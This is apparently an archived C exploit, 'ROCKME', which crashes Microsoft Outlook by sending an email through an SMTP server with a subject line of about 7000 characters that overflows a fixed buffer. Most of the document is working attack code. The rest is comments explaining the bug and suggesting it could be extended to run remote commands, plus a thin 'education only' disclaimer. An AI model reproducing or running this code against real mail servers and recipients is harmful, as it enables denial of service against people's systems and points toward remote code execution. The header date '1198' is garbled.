ROCKME Microsoft Outlook Denial Of Service exploit code.
269314cd746ad4c486cfe97507b53af1517205a1d58d79b417932f16410549ed
/*
ROCKME Microsoft Outlook Denial Of Service.
Warning ! This program is for education purpose only !
The AUTOR SHOULD NOT BE RESPONSABLE FOR bad and NON LEGAL USE of this program .
26/10/1198
rockme@altern.org
*/
/* Greeting to Zyrtex, Next, Clement and everyone i know :p */
/* Yes this is another security all in a Microsoft product ... */
/* it's incredible we can ask our self where are Microsoft find their */
/* programmers :). Microsoft Outlook is a mail reader program under */
/* the Windows XX environment. beurk ... :( */
/* One more time Microsoft show us his powerless in computer security */
/* I think that Unix is the best way for the moment . */
/* Explaination of the bug : */
/* When Microsoft Outlook read the subject of an e-mail he place it in */
/* a board with a size of about 5000 characters, and do not check the */
/* size of the received subject ! */
/* This program just made windows crashing. It's also possible to */
/* execute remote command but I havn't got enough time to cod it. */
/* I think that malicious user will be able to modify this program for */
/* executing remote commands. */
/* Some people said that when you overwrite the buffer of Outlook, */
/* Windows overwrite the swap space an then make your windows unusable */
/* But i havn't seen anything like that . */
/* */
/* Have fun ! and remember, no bad use :) */
/* let's start */
#include <stdio.h>
#include <strings.h>
#include <errno.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
struct in_addr
resolv(char *name)
{
static struct in_addr in;
unsigned long l;
struct hostent *ent;
if((l = inet_addr (name)) != INADDR_NONE)
{
in.s_addr = l;
return in;
}
if(!(ent = gethostbyname (name)))
{
in.s_addr = INADDR_NONE;
return in;
}
return *(struct in_addr *) ent->h_addr;
}
char buf[70000];
char server[5000];
char mailfrom[5000];
char rcptto[5000];
main (int argc, char *argv[])
{
struct sockaddr_in addr;
int i, s;
char c;
int port=25;
if(argc < 3){
printf("\n Usage : %s mail_server sender recipient \n\n", argv[0]);
printf(" Warning this program do not spoof your IP adress !\n\n");
exit(0);
}
if(strlen(argv[1]) > 4990){
printf("Sorry mailserver is too big .\n");
exit(0);
}
if(strlen(argv[2]) > 4990){
printf("Sorry sender is too big .\n");
exit(0);
}
if(strlen(argv[3]) > 4990){
printf("Sorry recipient is too big .\n");
exit(0);
}
/* Mwarf, my program is protected from buffer overflow attacks :) */
printf("\nRockme Security Research Laboratory !\n\n\n");
printf("Microsoft Outlook Denial of Service !\n");
printf("Veuillez patienter environ 20 secondes suivant la vitesse du serveur ...\n");
sprintf(server, "HELO %s\n", argv[1]);
sprintf(mailfrom, "MAIL FROM: %s\n", argv[2]);
sprintf(rcptto, "RCPT TO: %s\n", argv[3]);
s = socket(AF_INET, SOCK_STREAM, 0);
addr.sin_family = AF_INET;
addr.sin_addr = resolv(argv[1]);
addr.sin_port = htons(port);
connect(s, (struct sockaddr *) &addr, sizeof (addr));
write(s, server, strlen(server));
sleep(1);
write(s, mailfrom, strlen(mailfrom));
sleep(1);
write(s, rcptto, strlen(rcptto));
sleep(1);
write(s, "data\n", 5);
sleep(1);
write(s, "Subject : ", 10);
sleep(1);
for(i = 1; i < 7000; i++){
write(s, "X", 1);
}
sleep(3);
write(s, "\n", 1);
sleep(1);
write(s, "bonjour\n", 8);
sleep(1);
write(s, ".\n", 2);
sleep(1);
write(s, "quit\n", 5);
sleep(1);
read(s, buf, 69000); /* read (s, &c, 1); */
printf("%s", buf);
printf("\n");
}